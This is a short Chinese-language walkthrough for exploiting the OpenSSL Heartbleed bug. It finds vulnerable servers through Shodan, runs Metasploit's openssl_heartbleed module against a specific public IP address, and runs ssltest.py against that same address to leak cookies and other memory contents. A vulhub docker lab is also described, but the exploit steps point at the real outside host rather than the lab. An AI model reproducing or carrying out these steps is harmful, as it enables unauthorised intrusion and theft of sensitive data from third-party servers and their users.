准备工作
- 使用shodan搜索相关站点
关键词:openssl/1.0.1a
- 访问地址
https://possible.lv/tools/hb/
进行在线测试搜索到的站点,查看是否存在漏洞
方法一:利用Metasploit进行渗透
- 开启Metasploit,查找心脏滴血漏洞并利用
msfconsole
search openssl_heartbleed
use auxiliary/scanner/ssl/openssl_heartbleed
- 配置源地址和源端口,IP地址为查找到的站点,端口号设为443,并执行run命令
show options
set RHOSTS 92.154.49.106
set RPORT 443
run
通过结果可以看到Heartbeat response with leak,证明漏洞存在
- 设置verbose 为true,输出进度条记录
set VERBOSE true
exploit
从结果可以看出我们可以利用该漏洞获取到cookie值等敏感信息
方法二:利用docker环境复现
- 进入vulhub目录选择环境
cd openssl/heartbleed/
- 编译并启动环境
docker-compose build
docker-compose up -d
- Python2运行ssltest.py,获取敏感数据
IP地址为查询到的站点
python ssltest.py 92.154.49.106 -p 443